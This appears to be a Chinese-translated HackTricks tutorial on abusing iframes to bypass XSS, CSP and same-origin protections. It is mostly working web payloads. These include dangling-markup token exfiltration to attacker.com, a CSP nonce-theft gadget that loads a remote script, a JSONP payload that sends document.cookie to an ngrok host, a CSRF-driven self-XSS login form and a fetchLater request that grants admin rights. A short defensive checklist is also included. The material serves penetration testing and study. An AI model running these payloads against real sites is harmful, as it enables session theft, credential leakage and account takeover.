12 KiB
Iframes in XSS, CSP and SOP
{{#include ../../banners/hacktricks-training.md}}
Iframes in XSS
有3种方式来指示iframe页面的内容:
- 通过
src指示一个URL(该URL可以是跨源或同源) - 通过
src使用data:协议指示内容 - 通过
srcdoc指示内容
访问父变量和子变量
<html>
<script>
var secret = "31337s3cr37t"
</script>
<iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if2" src="child.html"></iframe>
<iframe
id="if3"
srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe
id="if4"
src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
<script>
function access_children_vars() {
alert(if1.secret)
alert(if2.secret)
alert(if3.secret)
alert(if4.secret)
}
setTimeout(access_children_vars, 3000)
</script>
</html>
<!-- content of child.html -->
<script>
var secret = "child secret"
alert(parent.secret)
</script>
如果您通过 HTTP 服务器(如 python3 -m http.server)访问之前的 HTML,您会注意到所有脚本都会被执行(因为没有 CSP 阻止它)。父级将无法访问任何 iframe 内部的 secret 变量,只有 if2 和 if3(被视为同站)可以访问原始窗口中的 secret。
请注意 if4 被认为具有 null 来源。
带 CSP 的 Iframes
Tip
请注意,在以下绕过中,响应的 iframed 页面不包含任何阻止 JS 执行的 CSP 头。
script-src 的 self 值将不允许使用 data: 协议或 srcdoc 属性执行 JS 代码。
然而,即使 CSP 的 none 值也将允许执行在 src 属性中放置 URL(完整或仅路径)的 iframes。
因此,可以通过以下方式绕过页面的 CSP:
<html>
<head>
<meta
http-equiv="Content-Security-Policy"
content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk'" />
</head>
<script>
var secret = "31337s3cr37t"
</script>
<iframe id="if1" src="child.html"></iframe>
<iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe
id="if3"
srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe
id="if4"
src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</html>
注意到之前的 CSP 仅允许执行内联脚本。
然而,只有 if1 和 if2 脚本将被执行,但只有 if1 能够访问父级秘密。
因此,如果您可以将 JS 文件上传到服务器并通过 iframe 加载,即使 script-src 'none',也有可能绕过 CSP。这也可能通过滥用同站 JSONP 端点来实现。
您可以通过以下场景进行测试,即使在 script-src 'none' 的情况下也会窃取 cookie。只需运行应用程序并使用浏览器访问它:
import flask
from flask import Flask
app = Flask(__name__)
@app.route("/")
def index():
resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
resp.headers['Content-Security-Policy'] = "script-src 'self'"
resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
return resp
@app.route("/cookie_s.html")
def cookie_s():
return "<script>alert(document.cookie)</script>"
if __name__ == "__main__":
app.run()
新的(2023-2025)CSP 绕过技术与 iframes
研究社区继续发现创造性的方法来利用 iframes 以击败限制性政策。以下是过去几年发布的最显著的技术:
- 悬挂标记 / 命名 iframe 数据外泄 (PortSwigger 2023) – 当一个应用程序反射 HTML 但强 CSP 阻止脚本执行时,您仍然可以通过注入一个 悬挂
<iframe name>属性来泄露敏感令牌。一旦部分标记被解析,运行在不同源的攻击者脚本导航框架到about:blank并读取window.name,此时包含了直到下一个引号字符的所有内容(例如 CSRF 令牌)。由于没有 JavaScript 在受害者上下文中运行,攻击通常会避开script-src 'none'。一个最小的 PoC 是:
<!-- 在敏感 <script> 之前的注入点 -->
<iframe name="//attacker.com/?"> <!-- 属性故意留空 -->
// attacker.com 框架
const victim = window.frames[0];
victim.location = 'about:blank';
console.log(victim.name); // → 泄露的值
- 通过同源 iframe 窃取 nonce (2024) – CSP nonce 并未从 DOM 中移除;它们仅在 DevTools 中被隐藏。如果攻击者可以注入一个 同源 iframe(例如通过上传 HTML 到网站),子框架可以简单地查询
document.querySelector('[nonce]').nonce并创建新的<script nonce>节点以满足政策,从而在strict-dynamic的情况下实现完全的 JavaScript 执行。以下小工具将标记注入升级为 XSS:
const n = top.document.querySelector('[nonce]').nonce;
const s = top.document.createElement('script');
s.src = '//attacker.com/pwn.js';
s.nonce = n;
top.document.body.appendChild(s);
- 表单操作劫持 (PortSwigger 2024) – 一个省略
form-action指令的页面可以通过注入的 iframe 或内联 HTML 将其登录表单 重新定向,使密码管理器自动填充并提交凭据到外部域,即使存在script-src 'none'。始终用form-action补充default-src!
防御注意事项(快速检查清单)
- 始终发送 所有 控制次级上下文的 CSP 指令(
form-action、frame-src、child-src、object-src等)。 - 不要依赖 nonce 是秘密的——使用
strict-dynamic并且 消除注入点。 - 当您必须嵌入不受信任的文档时,非常小心 使用
sandbox="allow-scripts allow-same-origin"(如果您只需要脚本执行隔离,则不使用allow-same-origin)。 - 考虑深度防御 COOP+COEP 部署;新的
<iframe credentialless>属性(§ 下文)让您可以在不破坏第三方嵌入的情况下做到这一点。
在野外发现的其他有效载荷
<!-- This one requires the data: scheme to be allowed -->
<iframe
srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
<!-- This one injects JS in a jsonp endppoint -->
<iframe srcdoc='
<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
<!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
<iframe
src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
Iframe sandbox
iframe中的内容可以通过使用sandbox属性受到额外限制。默认情况下,此属性不被应用,这意味着没有限制。
当使用时,sandbox属性施加了几个限制:
- 内容被视为来自一个独特的源。
- 任何提交表单的尝试都被阻止。
- 禁止执行脚本。
- 禁用对某些API的访问。
- 防止链接与其他浏览上下文交互。
- 不允许通过
<embed>、<object>、<applet>或类似标签使用插件。 - 防止内容自身导航到其顶级浏览上下文。
- 自动触发的功能,如视频播放或表单控件的自动聚焦,被阻止。
提示:现代浏览器支持细粒度标志,如allow-scripts、allow-same-origin、allow-top-navigation-by-user-activation、allow-downloads-without-user-activation等。将它们组合以仅授予嵌入应用所需的最低能力。
属性的值可以留空(sandbox="")以应用上述所有限制。或者,可以设置为一个以空格分隔的特定值列表,以使iframe免于某些限制。
<!-- Isolated but can run JS (cannot reach parent because same-origin is NOT allowed) -->
<iframe sandbox="allow-scripts" src="demo_iframe_sandbox.htm"></iframe>
Credentialless iframes
正如在 this article 中所解释的,iframe 中的 credentialless 标志用于在不发送凭据的请求的情况下加载页面,同时保持 iframe 中加载页面的同源策略 (SOP)。
自 Chrome 110 (2023年2月) 起,该功能默认启用,并且该规范正在以 anonymous iframe 的名称在各个浏览器中标准化。MDN 将其描述为:“一种机制,用于在全新的、短暂的存储分区中加载第三方 iframe,以便不与真实来源共享任何 cookies、localStorage 或 IndexedDB”。对攻击者和防御者的影响:
- 不同的 credentialless iframes 中的脚本 仍然共享相同的顶级来源,并可以通过 DOM 自由交互,使多 iframe 自我 XSS 攻击成为可能(见下面的 PoC)。
- 由于网络是 去凭据化的,iframe 内的任何请求实际上表现为未认证会话 – CSRF 保护的端点通常会失败,但通过 DOM 泄露的公共页面仍在范围内。
- 从 credentialless iframe 生成的弹出窗口获得隐式的
rel="noopener",破坏了一些 OAuth 流程。
// PoC: two same-origin credentialless iframes stealing cookies set by a third
window.top[1].document.cookie = 'foo=bar'; // write
alert(window.top[2].document.cookie); // read -> foo=bar
- 利用示例:Self-XSS + CSRF
在此攻击中,攻击者准备了一个包含两个 iframe 的恶意网页:
- 一个加载受害者页面的 iframe,带有
credentialless标志,并且有一个触发 XSS 的 CSRF(想象一下用户的用户名中有 Self-XSS):
<html>
<body>
<form action="http://victim.domain/login" method="POST">
<input type="hidden" name="username" value="attacker_username<img src=x onerror=eval(window.name)>" />
<input type="hidden" name="password" value="Super_s@fe_password" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
- 另一个 iframe 实际上已经登录用户(没有
credentialless标志)。
然后,从 XSS 中可以访问另一个 iframe,因为它们具有相同的 SOP,并通过执行来窃取 cookie:
alert(window.top[1].document.cookie);
fetchLater 攻击
正如这篇文章中所述,API fetchLater 允许配置请求在稍后执行(在一定时间后)。因此,这可以被滥用,例如,在攻击者的会话中登录受害者(使用 Self-XSS),设置一个 fetchLater 请求(例如更改当前用户的密码)并从攻击者的会话中注销。然后,受害者在自己的会话中登录,fetchLater 请求将被执行,将受害者的密码更改为攻击者设置的密码。
这样,即使受害者的 URL 不能在 iframe 中加载(由于 CSP 或其他限制),攻击者仍然可以在受害者的会话中执行请求。
var req = new Request("/change_rights",{method:"POST",body:JSON.stringify({username:"victim", rights: "admin"}),credentials:"include"})
const minute = 60000
let arr = [minute, minute * 60, minute * 60 * 24, ...]
for (let timeout of arr)
fetchLater(req,{activateAfter: timeout})
Iframes in SOP
检查以下页面:
{{#ref}} ../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md {{#endref}}
{{#ref}} ../postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md {{#endref}}
{{#ref}} ../postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md {{#endref}}
{{#ref}} ../postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md {{#endref}}
References
- PortSwigger Research – Using form hijacking to bypass CSP (March 2024)
- Chrome Developers – Iframe credentialless: Easily embed iframes in COEP environments (Feb 2023) {{#include ../../banners/hacktricks-training.md}}